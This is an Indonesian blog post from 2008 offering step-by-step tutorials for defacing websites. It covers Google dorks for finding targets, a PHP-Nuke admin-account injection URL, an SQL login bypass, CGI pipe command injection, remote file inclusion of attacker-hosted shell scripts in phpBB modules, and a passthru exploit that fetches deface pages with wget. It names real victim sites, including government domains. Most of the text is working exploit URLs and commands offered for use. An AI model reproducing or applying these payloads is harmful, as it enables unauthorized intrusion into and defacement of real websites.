Sabtu, 04 Oktober 2008

coba di pelajari dgn lengkap pasti asik lho

langkah-langkah deface

Deface situs php nuke


Buka situs www.google.com

kemudian ketik =>

allinurl:.com/nuke/index.php atau

allinurl:.org/nuke/index.php.

Nah ….. kalo udah ketemu targetnya maka langkah

selanjutnya adalah :

1. www.target.com/nuke/index.php

2. www.target.com/nuke/admin.php =>

index.php yg diatas tadi dirubah

menjadi admin.php

3. Masukkan bug ini di belakang situs tadi :


?op=AddAuthor&add_aid=budakbaonk&add_name=

God&add_pwd=bajingan&add_email=

sandal_karet@yahoo.com&add_radminsuper=1&admin=

eCcgVU5JT04gU0VMRUNUIDEvKjox


misal : www.target.com/nuke/admin.php?

op=AddAuthor&add_aid=budakbaonk&add_name=

God&add_pwd=bajingan&add_email=

sandal_karet@yahoo.com&add_radminsuper=1&admin=

eCcgVU5JT04gU0VMRUNUIDEvKjox


Kalo nggak mau berarti situs tsb udah di path ama admin nya.

Tapi kalo berhasil, maka di url/browsing lu muncul

www.target.com/nuke/admin.php?op=mod_author


5. Disana lu di suruh login, masukin id & password lu tadi.

Masih ingat kan ?

id=budakbaonk => liat yg diatas tadi

password=bajingan => liat yg diatas tadi


Nah lu skrg udah masuk ke “Administration Menu” situs tsb.

Berarti lu udah mengusai situs tsb skrg ! He he he he he

Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),

Kolom title =>



Kolom content =>



Kolom expiration => unlimited

trus klik tab add messages yg ada dibawah

Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,

misal www.target.com/nuke atau www.target.com/nuke/index.php

kalo nggak ada hasil deface lu coba klik tab refresh yg ada

diatas yg disamping url/browsing lu


========================================


Deface asp/iis dgn menggunakan win 98


1. Klik Icon “My Computer” di komputer kamu.

2. Cari Icon “Web Folder” didalam My Computer Itu.

3. Klick lagi Icon “Add web folder” dan akan muncul

“Type the location to add”.

4. Ketiklah nama situs yang akan kita deface/tambahkan filenya

misalnya http://www.52down.com. Kemudian klik Next.

5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish.

kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface

jadi kamu musti cari target lain.

6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat

ada file http://www.52down.com. Klik file situs tsb.

7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html,

lu buat dulu file html di ms.fronpage trus simpan di kompi lu)

terus copy kemudian kembali lagi ke file http://www.52down.com,

paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya

udah dipath sama adminnya, jadi kamu musti cari target lain.

8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing

misalnya http://www.52down.com/Test.html

9. Kalau mau mencari target caranya cari di www.google.com terus

ketik allinurl:.com/index.asp atau allinurl:.org/default.asp

tinggal kreatifitas kamu mencari target.

Atau bisa cari target di http://www.zone-h.org/en/defacements/

klik mirror yg sebelah kanan (yg windows 2000),

Perhatikan target nya => Defacer: Infektion Group

Domain : www.namatarget.com <<>

=======================================


cara membuat html :


Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,

trus pilih enable hyperlink, trus pilih color background,

pilih warna hitam, trus ok

Trus pilih tab center yg diatas (rata tengah) kayak ms.word,

ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),

pilih warna merah, kalo udah tulis Hacked by nama nick kamu,

tekan enter 3 kali Trus ketik

Hey Admin……..do you a need help ? trus enter sekali,

trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali

Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,

trus pilih from file…., di file name ketik

http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu

trus ok Kalo mau pake musik pilih tab format diatas,

trus pilih backgrounds trus pilih tab general,

pada “background sound location” ketik

http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu

trus ok Utk nyimpan nya pilih tab file diatas, pilih save as…

file name : Hacked atau nama nick kamu, trus ok

Catatan : seandainya waktu lu nyimpan file ada keluar

“save embedded file” pilih “set action” trus pilih “dont save” trus ok

Utk meliat hasilnya pilih tab preview dibagian bawah.


=======================================


Deface guestbook (buku tamu)


Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook

(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak

semua guestbook bisa dideface.

Langkah2 nya


I. Cari target guestbook di www.google.co.id dgn mengetikkan

site:my guestbook.php atau site:com bukutamu.php


II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php

maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.

Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,

cukup identitas palsu aja.


contoh :


Nama : boneka lucu

Email : boneka_2005@yahoo.com

Website : www.boneka-lucu.com

Asal : toko boneka

Komentar :


Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara

SQL Injection ke guestbook tsb, disitu kita akan memasukkan

sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?

ntar dimarah mama). Trus klik tombol “submit” atau tombol apa

namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus

ketik target tadi www.namatarget.my/guestbook.php

Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing

lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.

Berarti guestbook tsb bisa dideface.


Catatan :

Kalo nggak ada gambarnya, yg ada hanya tulisan



berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !

cari target yg lain.


III. Kalo udah muncul gambar yg kita masukkan tadi,

buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.


contoh :


Nama : deface

Email : deface_2005@yahoo.com

Website : www.deface.com

Asal : dunia maya

komentar :




Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.


Catatan :

Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai

keinginan lu.


IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb.

Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php

Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu.

Nah…muncul deh hasil deface kita di guestbook tsb.


======================================


deface asp dgn sql injection


1. buka browsing/url www.google.co.id

2. ketik site:go.id login.asp

misal nya kita dapat target www.namatarget.com/login.asp

3. username dan pass ketik ‘or”=’

4. buka satu persatu file yg ada disana

5. cari file yg bisa kita ubah/deface

6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com

7. kalo hasil nya belum ada, klik tab refresh disamping url lu


======================================


deface cgi


https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< file aslinya

tambahin |pwd| diujungnya

|pwd| <<< perintah/bug utk linux/unix

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|pwd|

yg keluar di web target adalah /home/sites/site52/users/wolfsecu/web/coartcds/Web_store

ok......lanjut

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /home/sites/site52/users/wolfsecu/web/jh.htm|

kasih jarak 1 spasi wget dgn situs lu

-O << ini huruf -O besar, bukan angka nol

cara liat nya => https://bronte.netpresence.com.au/~wolfsecu/arai.html

…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< perhatikan baik2

.../home/sites/site52/users/wolfsecu/web/jh.htm <<< perhatikan baik2

.../coartcds/Web_store <<< musti dibuang

cara cari target => allinurl:*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N

target nya musti file html diujung nya kalo mau tambahin |pwd|


=======================================


deface cgi II


http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack” > /usr/home/web/users/a0004481/html/adspro/jh.html|

http://www.sports-media.org/adspro/jh.html


http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm << file asli

|id| <<<<<<<<<<<<<<< utk meliat user yg ada diserver tsb

|pwd| <<<<<<<<<<<<< utk meliat file yg ada diserver tsb

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd| >>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro

usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< perhatikan baik2

usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< perhatikan baik2

cgi-bin/adspro <<<<<<< dibuang

liat file index.html => http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|

http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack”>decae.html|&cart_id=9721374.5730

http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20


======================================


deface php dgn injection


http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4

itu file aslinya

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

itu bug nya

http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?

jadi index.php?name=PNphpBB2&file=index&c=4 dibuang

cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak command unix masukin

wget http://geocities.com/nusantarajaya_2004/arai.html

cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html


http://www.narnia-chroniken.de <<< halaman depan di deface

http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?

ketik : pwd

cd /homepages/7/d117874362/htdocs;wget file deface


========================================


deface php dgn injection II


http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php

itu file aslinya

http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak masukin: pwd

jadi pics%2Fom%2Findex.php dibuang

cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html

cara liat nya http://www.giphted.com/arai.html


=========================================


deface phpbb/forum


http://www.bpmpt.go.id/forum/index.php

itu file aslinya

includes/db.php?phpbb_root_path=

itu bug nya

jadi index.php dibuang

http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?

dikotak masukin: pwd

Kalo keluar “Hacking attempt” artinya dipath

Tapi kalo berhasil, terserah lu mau di apain……


==========================================


deface phpbb/forum II


http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12

itu file aslinya

&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

itu bug nya


cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd


cara wget nya ada 3 cara :

1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls

2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm

3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls

biasa nya cara ke 3 yg berhasil.


cara liat nya http://singapore.bluejackings.net/arai.html


=========================================


cara liat fs tanpa login


http://www.friendster.com/useropen.php?uid=

<<<<<<>


===========================================


deface php dgn injection III


langsung di tembak aja bos biar ga lama2

www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?

kolo berhasil seperti biasa

cmd sql php injection

buat nyari akses ke foldernya

cmd => find / -perm 777 -type d

klo foldernya permision denied berarti kita ga bisa apa2 di folder itu

cari folder yg ga ada tulisan perm

ambil contoh ini

http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?

cari akses foldernya [commndnya diatas]

cmd => find / -perm 777 -type d

bakal makan B/w

jd sabar aja

=== contoh -perm denied ==

find: /mnt/drive2/lost+found: Permission denied

find: /proc/tty/driver: Permission denied

find: /proc/1/task/1/fd: Permission denied

itu artinya no akses

kita cari yg lain

tp usahakan foldernya yg /var/www/

klo ga ada juga gpp

ada yg lain

/home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg bisa

cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]

[command dasar OSnya] => wget, dir, cat, rm, rv -rf dll

skarang kita wget

cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html

coba lo masukin

ke cmdnya

———————————————————

–10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html

=> `arai.html’

Resolving www.geocities.com… 66.218.77.68

Connecting to www.geocities.com[66.218.77.68]:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 6,021 [text/html]

0K ….. 100% 98.21 KB/s

10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021]

———————————————————

itu artinya sukses ke save

karena httpdocs

gampang cara liatnya

/home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[file deface lo]

contoh www.hdca.org/downloads/arai.html

selsai deh

gampang kan


http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/

http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=

http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=id;pwd

http://img143.imageshack.us/img143/6782/hacked8lc.jpg

http://www.sobatpadi.net/download/


http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20-la

http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

Diposting oleh di